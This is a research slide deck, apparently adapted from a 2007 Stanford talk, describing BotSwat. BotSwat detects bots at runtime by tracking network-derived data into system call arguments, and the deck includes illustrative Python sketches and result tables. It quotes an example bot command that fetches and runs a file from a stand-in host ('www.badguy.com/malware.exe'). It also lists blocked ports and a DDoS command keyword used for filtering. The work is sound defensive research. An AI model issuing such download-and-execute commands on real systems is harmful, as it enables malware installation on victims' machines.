BotSwat host based run time bot detection

Characterizing Bots’ Remote Control Behavior
DIMVA 2007 (SIG SIDAR Conference on Detection of Intrusions and Malware & Vulnerability Assessment)



    Liz Stinson (stinson@cs.stanford)
 John Mitchell (mitchell@cs.stanford)
                                Stanford University

                               Modified by Kyungdong Kim
The problem
• Can we distinguish the execution of malicious bots from that of innocuous processes?
   - Dynamic, behavior-based approach
• Non-problems (for now):
   - How did the bot get there?
   - What do we do once we detect it?
   - Building a bullet-proof detection system
Outline
   - Background info on bots
   - Characterizing remote control
   - Our method and implementation
   - Experimental results
Botnet: programmable platform
capability                ago   DSNX  evil  G-SyS sd    Spy
create port redirect      √     √           √     √     √
other proxy               √
web download              √     √           √     √     √
DNS resolution            √                 √     √
UDP/ping floods           √           √     √     √
other DDoS floods         √                 √           √
scan/spread               √     √           √     √     √
spam                      √
visit URL (click fraud)   √                 √     √

Capabilities are exercised via commands.
Existing host-based bot detection
• Signature-based (most AV products)
• Rule-based
   - Monitor outbound network connection attempts (e.g. ZoneAlarm, BINDER)
   - Block certain ports (25, 6667, ...)
• Hybrid: content-based filtering
   - Match network packet contents to known command strings (keywords)
   - E.g. Gaobot DDoS cmds: .ddos.httpflood
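A minimal sketch of the rule-based and content-based checks listed above, assuming each packet is already available as a destination port and a payload. Only the ports 25 and 6667 and the string `.ddos.httpflood` come from the slide; the function names are hypothetical.

```python
# Ports named on the slide (SMTP and IRC).
BLOCKED_PORTS = {25, 6667}

# Known command strings; only this one appears on the slide.
KNOWN_COMMANDS = [b".ddos.httpflood"]

def port_blocked(dst_port: int) -> bool:
    """Rule-based check: is the outbound destination port on the block list?"""
    return dst_port in BLOCKED_PORTS

def payload_matches(payload: bytes) -> bool:
    """Content-based check: does the payload contain a known command string?"""
    return any(keyword in payload for keyword in KNOWN_COMMANDS)

print(port_blocked(6667))
print(payload_matches(b"PRIVMSG #chan :.ddos.httpflood www.example.com"))
print(payload_matches(b"PRIVMSG #chan :.DDOS.HTTPFLOOD www.example.com"))
```

The match is a literal byte comparison, so a variant that renames or re-cases the command string is no longer caught by this kind of filter.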
Network-based botnet detection
   - Use botnets’ ongoing C&C behavior as basis of detection
   - {port, proto, content-based} filtering
   - Set up honeypot; capture bots; obtain bot; infiltrate bot net/C&C dialogue
   - Model bot-infection sequence
   - Botnet traffic: anomalous rate of dynamic-DNS lookups
Challenges: change C&C protocol, botnet topology, timing; encrypt C&C traffic; use other than worm-like spreading…
Our thesis
• We can distinguish the behavior of bots (as they execute on their hosts) from that of innocuous processes via detecting “remote control”

• How to detect remote control?
Example: agobot on Windows XP receives a command via the NIC:
   http.execute www.badguy.com/malware.exe C:\WINDOWS\bad.exe
and then invokes:
   connect( … www.badguy.com, … )
   send( …, “… GET /malware.exe …”, … )
   fcreate(…, “C:\WINDOWS\bad.exe”, …)
What does remote control look like?
• http.execute <URL> <local_path>
• Invoke system calls: connect, network send and recv, create file, write file, …
• On arguments received over the network: IP to connect to, object to request, file name, …
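To make the link between a command and its system call arguments concrete, here is a small sketch that splits an `http.execute <URL> <local_path>` command into the values that would reach the calls named above. It is an illustration only, not agobot's actual parser; the function name and the dictionary keys are hypothetical.

```python
def syscall_args_from_command(line: str) -> dict:
    """Split 'http.execute <URL> <local_path>' into the values that would
    end up as system call arguments (illustrative only)."""
    name, url, local_path = line.split(maxsplit=2)
    if name != "http.execute":
        raise ValueError(f"unsupported command: {name}")
    host, _, obj = url.partition("/")
    return {
        "connect": host,            # host to connect to
        "send": f"GET /{obj}",      # object to request
        "create_file": local_path,  # file name to create
    }

args = syscall_args_from_command(
    r"http.execute www.badguy.com/malware.exe C:\WINDOWS\bad.exe"
)
for call, value in args.items():
    print(call, "<-", value)
```

Every value in the result originates in the network-supplied command line, which is the pattern the slide describes.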
Our theses
• We can distinguish the behavior of bots from that of innocuous processes via detecting “remote control”
• We can approximate “remote control” as “using data received over the network in a system call argument”
Identifying remote control
• Data received over the network is tainted
• Propagate taint
• Check for tainted args to syscalls
[Figure: SOURCES (including untainted data) → BotSwat → SINKS: bind(…), CreateProcessA(…), NtCreateFile(…), ...]
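The three steps of identifying remote control (taint on receive, propagate, check at sinks) can be sketched as follows. This is a toy model under stated assumptions: taint is carried as a flag on a hypothetical `Buf` wrapper rather than tracked over process memory, and all names are made up for illustration.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Buf:
    """A buffer plus a flag saying whether it derives from network data."""
    data: bytes
    tainted: bool = False

def net_recv(data: bytes) -> Buf:
    """Source: anything received over the network starts out tainted."""
    return Buf(data, tainted=True)

def copy_buf(src: Buf) -> Buf:
    """Propagation: a copy inherits the taint of its source."""
    return Buf(src.data, src.tainted)

def concat(a: Buf, b: Buf) -> Buf:
    """Propagation: the result is tainted if either input is."""
    return Buf(a.data + b.data, a.tainted or b.tainted)

def tainted_args(*args: Buf) -> list:
    """Sink check: return the argument values that carry taint."""
    return [a.data for a in args if a.tainted]

received = net_recv(rb"C:\WINDOWS\bad.exe")
path = copy_buf(received)
local = Buf(rb"C:\temp\log.txt")

print(tainted_args(path))   # argument derived from network data
print(tainted_args(local))  # argument created locally
```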
But wait…
• Early testing of benign programs: they may use tainted data in a system call arg in response to user input
   - E.g. user clicks on hypertext link (next slide)
[Figure: a benign browser uses tainted data after a user click]
   1  GET /
      Host: www.digg.com
   2  <HTML>… <A HREF="www.foo.com/openmoko...">OpenMoko - the Anti-iPhone</A>…</HTML>
   3  connect www.foo.com
   4  GET /openmoko
      Host: www.foo.com
• Solution: capture local user input (KB or mouse); sanitize subsequent uses of it
[Figure: SOURCES → BotSwat → SINKS: bind(…), CreateProcessA(…), NtCreateFile(…), ...]
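A minimal sketch of the sanitizing idea, assuming values are compared by content and kept in two plain sets. The set names and `should_flag` are hypothetical; the hosts are the ones used in the slides.

```python
tainted = set()  # values received over the network
clean = set()    # values the local user selected via keyboard or mouse

def should_flag(arg: str) -> bool:
    """Flag a system call argument only if it is tainted and not clean."""
    return arg in tainted and arg not in clean

# Browser: the link target arrives in HTML from the network...
tainted.add("www.foo.com")
# ...and the user then clicks it, so later uses of the value are sanitized.
clean.add("www.foo.com")

# Bot: the host arrives in a command; no local user input refers to it.
tainted.add("www.badguy.com")

print(should_flag("www.foo.com"))
print(should_flag("www.badguy.com"))
```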
BotSwat architecture: overview
• Interposition mechanism (Detours)
   - Interposes on API calls
• Tainting module [visibility?]
   - Instantiates and propagates taint
• User-input module [how to capture?]
   - Tracks local user input as received via KB or mouse (“clean” data); propagates cleanliness
• Behavior checking [which syscalls? conds?]
   - Monitors invocations of selected system calls
   - Queries tainting and user-input modules
   - Determines whether to flag invocation
• ~70k lines of C++; ~2200 intercepted functions
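The interposition idea can be illustrated with a Python decorator that wraps a function, inspects its arguments, and then calls the original. This is only an analogy for API-call interposition; it does not use or model the Detours library, and `interpose`, `flagged`, and `create_file` are hypothetical names.

```python
import functools

flagged = []  # (function name, tainted arguments) for each flagged call

def interpose(is_tainted):
    """Wrap a function so its arguments are checked before the real call."""
    def wrap(fn):
        @functools.wraps(fn)
        def hooked(*args):
            bad = [a for a in args if is_tainted(a)]
            if bad:
                flagged.append((fn.__name__, bad))
            return fn(*args)  # always forward to the original function
        return hooked
    return wrap

network_data = {r"C:\WINDOWS\bad.exe"}

@interpose(lambda a: a in network_data)
def create_file(path):
    return "handle:" + path

create_file(r"C:\temp\log.txt")
create_file(r"C:\WINDOWS\bad.exe")
print(flagged)
```

The wrapped function keeps its behavior; the hook only observes and records, which mirrors the split between interposition and behavior checking in the architecture above.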
Library-call level tainting
• Intercept calls made by process via a DLL to memory-copying functions
   - If C library functions are statically linked in (STAT), we won’t see run-time calls to these functions
• Handling visibility limitations
   - Taint a mem region on basis of its contents
   - Cache network receive buffers
• Taint propagation modes:
   - Cause-and-Effect (C&E): addr & content
   - Correlative (CORR): addr | content | substring
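One possible reading of the two propagation modes, sketched under assumptions: a system call argument is compared against cached network receive buffers, C&E requires both address and content to match, and CORR accepts a match on address, content, or substring. The `Region` type and the `min_len` threshold are hypothetical and not taken from the slides.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Region:
    addr: int       # start address of the memory region
    content: bytes  # bytes stored there

def tainted_ce(arg: Region, cached: list) -> bool:
    """Cause-and-Effect: address AND content must match a tainted region."""
    return any(arg.addr == t.addr and arg.content == t.content for t in cached)

def tainted_corr(arg: Region, cached: list, min_len: int = 4) -> bool:
    """Correlative: address OR content OR substring match is enough.
    min_len is an assumed guard against trivially short substrings."""
    return any(
        arg.addr == t.addr
        or arg.content == t.content
        or (len(arg.content) >= min_len and arg.content in t.content)
        for t in cached
    )

recv_buf = Region(0x1000, b"http.execute www.badguy.com/malware.exe")
same_buf = Region(0x1000, recv_buf.content)
host_arg = Region(0x2000, b"www.badguy.com")  # copied without visible calls

print(tainted_ce(same_buf, [recv_buf]), tainted_ce(host_arg, [recv_buf]))
print(tainted_corr(host_arg, [recv_buf]))
```

In this reading, the substring rule is what recovers taint when the copy from the receive buffer happened inside statically linked code that could not be intercepted.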
User input tracking
• Goal: Identify actions initiated by local app user
• Challenge: the data value associated with mouse input is heavily application-defined; it is not exposed via an API call or similar
• Solution: consider all data values referred to by the app while it is handling a mouse input event to be clean (an over-approximation)
   1. System creates message M
        Target Window: W
        Input Type: LMB click
        Location: <x,y>
   2. System posts M to thread’s queue (M1, M2, M3)
   3. App reads M from queue: GetMessage(...)
   4. App executes code to handle event: DispatchMessage(...)
        MainWndProc(…, UINT uMsg,…){
          switch (uMsg) {
             case WM_LBUTTONDOWN:
               ...
             ... } ...
Behaviors and gates
Behaviors:
   tainted open file, tainted create file, tainted prog exec, ...
   bind tainted IP, bind tainted port, ...
   tainted send, derived send, sendto tainted IP, sendto tainted port
Gates:
   NtOpenFile, NtCreateFile, NtDeviceIoControlFile, …
API functions leading to the gates:
   MoveFile{Ex}{A,W}, Win32DeleteFile, MoveFileWithProgress{Ex}{A,W}, DeleteFile{A,W}, ReplaceFile{A,W}
   CreateFile{A,W}, OpenFile, CopyFile{Ex}{A,W}, fopen, _open, _lopen, _lcreat, ...
   bind, send, sendto, WSASend, WSASendTo, SSL_write, …

Selection of behaviors/gates/sinks: informed by bot capabilities
Tested BotSwat against…
• Bots: ago, DSNX, evil, G-SyS, sd, Spy
   - What’s a bot variant?
      • Apply transformations (compression, encryption) to bot binary
      • Minor source edits (C&C params, config data, …)
   - With C lib functions dynamically and statically linked in
   - Variants from ago, sd, & Spy families: 98.2% of all bots seen in wild (’05)
• Eight benign programs: web browser; clients: email, ftp, ssh, chat, AV signature updater, IRC; IRC server
Results – overview
• Detected execution of most candidate cmds
• Detected vast majority of bots’ remote control behavior (even when couldn’t see bots’ calls to memory-copying functions)
   - # behaviors exhibited:          207
   - # behavs detected (DYN, C&E):   196
   - # behavs detected (STAT, CORR): 148
• Tested 8 benign progs; not many FPs
• Performance overhead: 2.81% (C&E), 3.87% (CORR)
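For reference, the behavior counts above translate into detection rates as follows. The snippet only does arithmetic on the three numbers from the slide; the variable names are arbitrary.

```python
exhibited = 207
detected = {"DYN, C&E": 196, "STAT, CORR": 148}

# Percentage of exhibited behaviors detected in each configuration.
rates = {mode: round(100 * n / exhibited, 1) for mode, n in detected.items()}

for mode, pct in rates.items():
    print(f"{mode}: {pct}%")
# DYN, C&E: 94.7%
# STAT, CORR: 71.5%
```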
Command detection
                               ago   DSNX   evil   G-SyS   sd   Spy
# commands                     88     28     5      56     50   36
# candidate commands           36     14     5      26     20   15
# cmds detected (DYN, C&E)     33     14    N/A     26     20   15
# cmds detected (STAT, CORR)   31     10     5      12     12   15
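The per-family share of candidate commands detected can be read off the table with a short calculation. The numbers are copied from the table; the N/A entry for evil is kept as `None`, and the helper name `rate` is hypothetical.

```python
candidates = {"ago": 36, "DSNX": 14, "evil": 5, "G-SyS": 26, "sd": 20, "Spy": 15}
detected = {
    "DYN, C&E":   {"ago": 33, "DSNX": 14, "evil": None, "G-SyS": 26, "sd": 20, "Spy": 15},
    "STAT, CORR": {"ago": 31, "DSNX": 10, "evil": 5, "G-SyS": 12, "sd": 12, "Spy": 15},
}

def rate(mode: str, family: str):
    """Percent of candidate commands detected, or None where the table says N/A."""
    hit = detected[mode][family]
    if hit is None:
        return None
    return round(100 * hit / candidates[family], 1)

for mode in detected:
    print(mode, {family: rate(mode, family) for family in candidates})
```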
Undetected candidate commands
• DYN, C&E (3)
   - Agobot scanning commands (2)
      • Takes IP prefix range as argument
      • Scans random IPs w/in that range
   - Agobot harvest registry command (1)
      • Takes registry key name, returns value
• STAT, CORR (28)
   - Many cmds which use sprintf to format arg buffers ... which are then passed to system calls (24)
Total # behaviors detected
        B1   B2   B3   B4   B5   B6   B7   B8   B9   B10  B11  B12  B13  B14  B15  B16  B17  B18
ago     5    6    7    2    1    5    14   2    14   1    7    3    1    1    1    1    0    0
DSNX    4    4    2    0    0    1    6    4    8    0    0    0    0    0    0    0    0    0
evil    0    0    5    0    0    0    0    0    0    0    0    0    0    0    0    0    0    0
G-SyS   1    1    8    0    0    1    8    4    10   1    1    1    0    0    0    0    3    1
sd      1    1    2    0    0    1    8    4    10   1    1    1    0    0    0    0    3    1
Spy     4    5    1    1    0    2    4    3    1    0    1    1    0    0    0    0    0    0
TOT     15   17   25   3    1    10   40   17   43   3    10   6    1    1    1    1    6    2

Use behavioral differences across families for variant classification.
Benign program testing
• Tested eight progs over typical activities
• Very few false positives
   - Auto download of linked images (browser, email) (4): <IMG SRC="…"> tags
   - Handling attachments: tainted create file (email) (1)
   - Direct Client-to-Client (DCC) file receipt (IRC client): user-input tracking limit (2)
      • But: recommended config is to disable this functionality
   - Server echoes data heard on one socket out on others (1)
• Interesting: Of the 8 FPs, 6 would not occur under different app configs
Our mechanism – review
• Single behavioral signature detects most of the bad stuff done by most bots
• Immune to differences that distinguish variants (and even families)
• Doesn’t rely on particular C&C protocol or botnet structure
• Low false positives
Questions?

				